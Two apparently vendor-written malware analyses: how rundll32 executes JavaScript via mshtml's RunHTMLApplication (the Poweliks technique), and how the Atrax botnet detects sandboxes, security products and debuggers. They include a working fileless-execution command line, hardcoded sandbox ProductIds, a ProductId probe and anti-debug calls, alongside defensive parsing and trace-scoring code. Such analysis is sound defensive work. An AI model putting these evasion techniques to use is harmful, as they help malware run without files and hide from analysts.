We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll, and how the "javascript:" prefix is used to execute actual JavaScript code.

Analysis of Rundll32


One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (',', 0x2C) to locate the DLL name and for a space (' ', 0x20) to locate the entry point name.


When using our sample command line, ParseCommand returns javascript:"\..\mshtml as the DLL name and RunHTMLApplication as the entrypoint. In this context, the space after RunHTMLApplication delimits the ‘optional arguments’ part of the rundll32 command line:


Dll loader

Rundll32 will perform several tries to load the actual DLL from the initial specification javascript:"\..\mshtml.

The first test uses the function GetFileAttributes("javascript:\"\..\mshtml"). This function eventually accesses C:\Windows\system32\mshtml. As this file is not found, the function returns -1.


SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeProcessSearchMode. The Microsoft definition of this key is:

When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0.

By default this registry value doesn't exist (on Windows XP / 7 / 8), so SearchPath tries to load the file mshtml from the current directory of rundll32 (c:\windows\system32) before trying to locate it in the system path.


All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again, this time searching for the module's manifest: javascript:"\..\mshtml.manifest

Since all the previous steps failed, Rundll32 eventually calls LoadLibrary("javascript:"\..\mshtml").

LoadLibrary is just a thin wrapper around LdrLoadDll, located in ntdll.dll. Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:"\..\mshtml.dll as a path. The token .. instructs it to go one folder up, so it resolves to mshtml.dll (think of foo\..\mshtml.dll resolving to mshtml.dll).

With the mshtml.dll specification, LdrLoadDll is able to load the library from the system directory.

Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication.

For the moment, the javascript: prefix seems pretty useless: LoadLibrary("foobar:\"\..\mshtml") works just as well. So, why prefix it with javascript:?

Protocol Handlers

Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication.

Even though it is not documented, the actual prototype of RunHTMLApplication can be inferred from the call made by c:\windows\system32\mshta.exe (the application dedicated to launching .hta files):

HRESULT RunHTMLApplication(
    HINSTANCE hinst,
    HINSTANCE hPrevInst,
    LPSTR szCmdLine,
    int nCmdShow
);
This is not far from the function prototype expected for a rundll32 entry point:

void CALLBACK EntryPoint(
    HWND hwnd,
    HINSTANCE hinst,
    LPSTR lpszCmdLine,
    int nCmdShow
);

RunHTMLApplication receives a handle to a window instead of a handle to a module as the first parameter. This parameter is used when mshtml registers a window class and creates a window of this new class. Passing a value that does not correspond to an actual module instance doesn't seem to disturb user32 very much…

The second parameter is not used at all, so the mismatch is not important.

The last parameter, nCmdShow, is used by the RunHTMLApplication function to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT to instruct any potential opened window to use window default placement.

The main parameter of interest is lpszCmdLine, which in our case is ";alert('foo');


This obviously leads to an issue, since this is not a valid JavaScript statement (note the missing double quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and instead requests the original command line again from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function).


The full command line contains the name of the executable and the parameters: GetCmdLine extracts the parameters by cleaning up the executable specification:


After that, RunHTMLApplication calls CreateUrlMoniker:


This is where the string "javascript:" is essential.

CreateUrlMoniker parses the command line to extract the string before the ':' character (0x3A): "javascript".

CreateUrlMoniker crawls the registry key HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\. These keys refer to a set of protocols and their CLSID.

CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript):


The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches "Microsoft HTML Javascript Pluggable Protocol".


It is for this reason that the string “javascript” is essential in the beginning of the parameters.

The same mechanism comes into play when one types javascript:alert('foo'); in the Internet Explorer navigation bar.


The remainder of the string, located after the ':' separator, is interpreted by the JavaScript URL moniker as JavaScript instructions:

"\..\mshtml,RunHTMLApplication ";alert('foo');

This is valid JavaScript: a string literal "\..\mshtml,RunHTMLApplication " (hence the double quotes that were skipped in all the previous steps!) followed by a function call (alert).

Finally RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed:

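The parsing chain walked through above, re-implemented in Python as an added example (not code from the original post, nor from rundll32 or mshtml): each function mimics one stage named in the analysis, and the final heuristic shows how a defender can flag command lines of this shape. Function names and the heuristic are our own; the Windows internals are simplified to the behaviour the post describes.

```python
"""Emulation of the parsing stages walked through above for the Poweliks
command line (ParseCommand, LdrLoadDll resolution, CreateUrlMoniker split).
Added example, not code from the post; function names are ours."""
import re

# The command line analysed in the post; the payload is a harmless alert().
POWELIKS_CMDLINE = 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";alert(\'foo\');'

def get_cmd_line(full_cmdline):
    """GetCmdLine: strip the executable token (quoted or not), keep the rest."""
    if full_cmdline.startswith('"'):
        end = full_cmdline.find('"', 1)
        return full_cmdline[1:end], full_cmdline[end + 1:].lstrip()
    exe, _, params = full_cmdline.partition(" ")
    return exe, params

def parse_command(params):
    """ParseCommand: DLL name up to the first comma (0x2C), entry point up to
    the next space (0x20); the remainder is the optional arguments."""
    dll, _, rest = params.partition(",")
    entry, _, optional = rest.partition(" ")
    return dll, entry, optional

def ldr_resolve(dll_spec, default_ext=".dll"):
    """LdrLoadDll: add the default extension when the last path component has
    none, then collapse '..' components: javascript:'\\..\\mshtml' -> mshtml.dll"""
    if "." not in dll_spec.rsplit("\\", 1)[-1]:
        dll_spec += default_ext
    parts = []
    for comp in dll_spec.split("\\"):
        if comp == "..":
            if parts:
                parts.pop()
        else:
            parts.append(comp)
    return "\\".join(parts)

def url_moniker_split(params):
    """CreateUrlMoniker: the scheme is the text before the first ':'; the rest
    is handed to that scheme's pluggable protocol handler (javascript here)."""
    scheme, sep, payload = params.partition(":")
    if not sep or len(scheme) < 2 or not re.fullmatch(r"[A-Za-z][A-Za-z0-9+.-]*", scheme):
        return None, params          # no scheme (a single letter is a drive specifier)
    return scheme.lower(), payload

def leading_js_string(payload):
    """The string literal the JavaScript payload opens with (the reason the
    stray double quotes survive every earlier stage), or None."""
    m = re.match(r'"(?:[^"\\]|\\.)*"', payload)
    return m.group(0) if m else None

def is_suspicious_rundll32(full_cmdline):
    """Defender heuristic: rundll32 whose DLL argument carries a URL scheme and
    a '\\..' traversal, the shape that makes this trick work."""
    exe, params = get_cmd_line(full_cmdline)
    if not exe.lower().endswith("rundll32.exe"):
        return False
    dll, _, _ = parse_command(params)
    scheme, _ = url_moniker_split(dll)
    return scheme is not None and "\\.." in dll
```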

Security point

From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application.

In other words, we can have all the power of Internet Explorer—its object model, performance, rendering power and protocol support—without enforcing the strict security model and user interface of the browser. Zone security is off, cross-domain script access is allowed, and we have read/write access to the files and system registry on the client machine.

With this trick, JavaScript is executed outside the Internet Explorer process, and the script is not subject to security features like Protected Mode / sandboxing on Vista and later.


RunHTMLApplication has the perfect prototype to work with Rundll32. Attackers have made great efforts to build a command line using the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment.

From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32 while specifying the script to run without writing any file on the file system.

That’s all folks!


Atrax is a malware family discovered during the summer of 2013. It includes some basic features like distributed denial of service, keylogging, the ability to steal banking credentials, to send spam or to install a Bitcoin miner. The particularity of Atrax is that it communicates with its command and control server over Tor, a protocol that enables online anonymity. An ESET blog post gives more information about this Tor-based botnet:

Atrax's specification highlights its anti-analyzer techniques:

- Anti-Analyzer (Protection against e.g.,
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine

The sample we studied was seen in the wild in April 2014 and submitted to the VirusTotal web site (

We chose to analyze the Atrax botnet as part of our permanent security monitoring, in order to be sure that our best-of-breed HIPS engine is able to block new techniques used by hackers. This article is not a full analysis of the malware; it focuses on the capabilities intended to avoid detection and analysis.

Sandbox detection

We started by looking at the anti-sandbox capability. To obtain a fast dynamic analysis of a potential malware sample, many online services provide sandboxes that give you a deeper look at what the application does on the operating system: the principle is to run the malware in a virtual machine and trace its behavior. When the timeout expires, the service produces a report and resets the virtual machine to its initial state for the next analysis. In this way, we can quickly know whether a binary file is malicious or not. Malware now tries to detect this kind of sandbox so that analysts cannot observe its behavior and security solutions cannot block it proactively.

To test the protection mechanism of Atrax, the sample was submitted to multiple online sandboxes:

  • Anubis: when executing, the binary file crashes (STATUS_ACCESS_VIOLATION), preventing behavioral analysis. This is the normal behavior of Atrax when it detects an online sandbox. The virtual machine was not infected.
  • Malwr: the binary file runs normally; the virtual machine was infected.
  • JoeBox (CWSandbox / File-analyzer): the binary file runs normally; the virtual machine was infected.
  • Comodo: the binary file runs normally; the virtual machine was infected.

Anubis aside, it is clear that the sandbox detection is not fully functional. This is due to the method used for environment fingerprinting: Atrax simply looks at the ProductId of the operating system.

ProductId is a unique 20-digit value derived from the product key and the hardware configuration. It is only displayed to the user for information and can be used when contacting Microsoft Support. It is stored in the registry value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId. You can display it by right-clicking My Computer and selecting Properties.



Because it is unique, this value identifies the computer. However, it is possible to alter it without causing any instability.

Atrax has a hardcoded list of ProductId values:

-   1: 76487-640-1457236-23837
-   2: 76487-644-3177037-23510
-   3: 55274-640-2673064-23950
-   4: 76497-640-6308873-23835
-   5: 76487-640-1464517-23259

If it finds one of these values, it means that the current environment is an online sandbox, and the Atrax process exits with an access violation.



In order to check which sandboxes these values correspond to, we developed a test program that displays the ProductId value of the sandboxes available on the Internet.

Some sandboxes report screenshots of the virtual machine, so it is easy to check the ProductId with a MessageBox. For sandboxes which do not report screenshot, the binary file creates a text file with the ProductId as filename.

#include <windows.h>
#include <stdio.h>
#include <tchar.h>

HKEY hkey;
FILE *found = NULL;
long lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows NT\\CurrentVersion"), 0, KEY_QUERY_VALUE, &hkey);
if (ERROR_SUCCESS == lResult)
{
    DWORD keytype;
    TCHAR data[200];
    DWORD bread = sizeof(data);   // buffer size in bytes, updated by RegQueryValueEx
    // Read the ProductId value (the call was cut off in the original listing)
    lResult = RegQueryValueEx(hkey, TEXT("ProductId"), NULL, &keytype, (LPBYTE)data, &bread);
    if (ERROR_SUCCESS == lResult)
    {
        // Key found: create an empty file named after the ProductId
        found = _tfopen(data, TEXT("w"));
    }
    RegCloseKey(hkey);
}

With this trick, we have determined that the first key (76487-640-1457236-23837) is the ProductId of Anubis sandbox. This is why the execution inside this sandbox turns into STATUS_ACCESS_VIOLATION.

The second and third keys do not work due to updated sandboxes. These keys are some kind of signature that matches CWSandbox and JoeBox.

76487-644-3177037-23510: matches CWSandbox.

55274-640-2673064-23950: matches JoeBox.

CWSandbox and JoeBox now appear to be a single product: JoeSecurity. JoeSecurity now automatically generates a new key for each run, making the two previously known keys obsolete. Strangely, the generated keys follow a recognizable pattern that is easy to detect. For example:

Windows XP:

Windows 7:

Funny fact: during our tests we had to submit our fingerprint executable several times to be sure that the ProductId is unique at each run. This apparently did not please JoeSecurity, and our IP address was simply banned from the server.

The last two keys 76497-640-6308873-23835 and 76487-640-1464517-23259 are less common and seem to be related to old instances of Malwr sandbox. Today Malwr generates a unique key for each run with no identifiable pattern:


In addition, although it is not implemented in Atrax, it is possible to detect whether an executable file has been uploaded to VirusTotal: the sandbox associated with the “Behavioral information” section always has the same ProductId: 76487-341-0620571-22546.

As we can see, this technique is not really effective, for several reasons. First, it is easy to implement a mechanism that generates a new ProductId for each run; we tried editing the ProductId of Windows 7 and Windows Update remained fully functional. Moreover, reading this registry value can itself be flagged as malicious behavior: it is not common for an executable file to look up the ProductId of the operating system.

Security products detection

Atrax also checks whether security products have injected code into the running process of the malware.

To do this, it uses a well-documented technique:

  • It finds the PEB (Process Environment Block) address (instruction mov eax, fs:[0x30])
  • It looks up Ldr (LoaderData) in the PEB (instruction mov ecx, [eax+0x0C])
  • It finds the InLoadOrderLinks list, which contains all the modules loaded by the running process (instruction mov edi, [ecx+0x0C])
  • It walks InLoadOrderLinks and compares each module name against a set of values.



For more information about this method:

Atrax looks for the following loaded binary files to detect if a security product monitors the current application:

This technique is limited to a few security products but does not prevent detection by antivirus.

Anti Debug

Atrax uses three different techniques to check for the presence of a debugger.


The first one uses the ZwSetInformationThread function:

NTSTATUS ZwSetInformationThread(
    IN HANDLE ThreadHandle,
    IN THREADINFOCLASS ThreadInformationClass,
    IN PVOID ThreadInformation,
    IN ULONG ThreadInformationLength
);

When ThreadInformationClass is set to 0x11 (ThreadHideFromDebugger), any debugger becomes blind to actions performed by this thread.




The second technique uses ZwQueryInformationProcess to detect a debugger:

NTSTATUS WINAPI ZwQueryInformationProcess(
    _In_      HANDLE ProcessHandle,
    _In_      PROCESSINFOCLASS ProcessInformationClass,
    _Out_     PVOID ProcessInformation,
    _In_      ULONG ProcessInformationLength,
    _Out_opt_ PULONG ReturnLength
);


When ProcessInformationClass is set to 0x7 (ProcessDebugPort), ProcessInformation is set to -1 when the process is being debugged.




Finally, Atrax uses the classical IsDebuggerPresent function call which looks for the BeingDebugged flag inside the PEB. If BeingDebugged equals 1, the process is debugged.
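The sandbox-detection and anti-debug checks described above, turned into detection logic as an added example (not code from the original post): it scores a constructed API trace for the ProductId read, the two Zw* information classes (0x11 and 0x7), IsDebuggerPresent and the access-violation exit. The trace line format, the function names and the labelling rules are assumptions of this example, not of any real sandbox.

```python
"""Scoring of a constructed sandbox API trace for the Atrax checks described
above: ProductId read, ThreadHideFromDebugger, ProcessDebugPort,
IsDebuggerPresent and the access-violation exit. Added example; names are ours."""
import re
from collections import defaultdict

TRACE_RE = re.compile(r"^(?P<pid>\d+)\|(?P<api>\w+)\|(?P<arg>.*)$")  # "<pid>|<api>|<arg>"
ANTI_DEBUG = {"hide_from_debugger", "debug_port_query", "is_debugger_present"}

def classify(api, arg):
    """Map one traced call to the evasion indicator it implements, or None."""
    a = arg.strip().lower()
    if api == "RegQueryValueEx" and a.endswith(r"\currentversion\productid"):
        return "productid_read"
    if api in ("NtSetInformationThread", "ZwSetInformationThread") and a == "0x11":
        return "hide_from_debugger"          # ThreadHideFromDebugger
    if api in ("NtQueryInformationProcess", "ZwQueryInformationProcess") and a == "0x7":
        return "debug_port_query"            # ProcessDebugPort
    if api == "IsDebuggerPresent":
        return "is_debugger_present"
    if api == "ProcessExit" and a == "status_access_violation":
        return "access_violation_exit"
    return None

def indicators_by_pid(trace_lines):
    """Collect the indicator set observed for every process in the trace."""
    seen = defaultdict(set)
    for line in trace_lines:
        m = TRACE_RE.match(line)
        if not m:
            continue                         # skip malformed lines
        tags = seen[m["pid"]]                # register the pid even with no hit
        tag = classify(m["api"], m["arg"])
        if tag:
            tags.add(tag)
    return dict(seen)

def verdict(indicators):
    """Labels for one process: a ProductId read followed by an access-violation
    exit is Atrax's reaction to a known sandbox; two or more debugger checks
    mark anti-debug behaviour. An empty tuple means nothing notable."""
    labels = []
    if {"productid_read", "access_violation_exit"} <= indicators:
        labels.append("sandbox-evasion")
    if len(indicators & ANTI_DEBUG) >= 2:
        labels.append("anti-debug")
    return tuple(labels)

def analyse(trace_lines):
    """Return {pid: labels} for a whole trace."""
    return {pid: verdict(t) for pid, t in indicators_by_pid(trace_lines).items()}

# Constructed sample: pid 1204 behaves like Atrax inside Anubis, pid 1300 is an
# ordinary program that reads an unrelated value under the same key.
SAMPLE_TRACE = [
    "1204|RegOpenKeyEx|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
    "1204|RegQueryValueEx|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductId",
    "1204|ZwSetInformationThread|0x11",
    "1204|ZwQueryInformationProcess|0x7",
    "1204|IsDebuggerPresent|",
    "1204|ProcessExit|STATUS_ACCESS_VIOLATION",
    "1300|RegQueryValueEx|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuild",
    "1300|ProcessExit|0",
]
```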


Malware’s specifications refer to VM detection. This functionality seems not to be included into the sample that has been studied but we can find some significant strings inside the binary file:

  • VMWare
  • VBOX
  • DiskVirtual_HD

Some VM detection code appears to be present, but static analysis shows that this part of the code is never called.


In this post we have seen that an effort was made to detect security products, but the detection of analysis environments is not really well implemented. One year after the malware's launch, it is fully detected by the sandboxes and the tricks used here are not effective. Yet there are a huge number of tricks documented on the Internet for anti-debug, anti-VM and anti-analysis; Atrax uses only the most basic ones.

For further information, please see: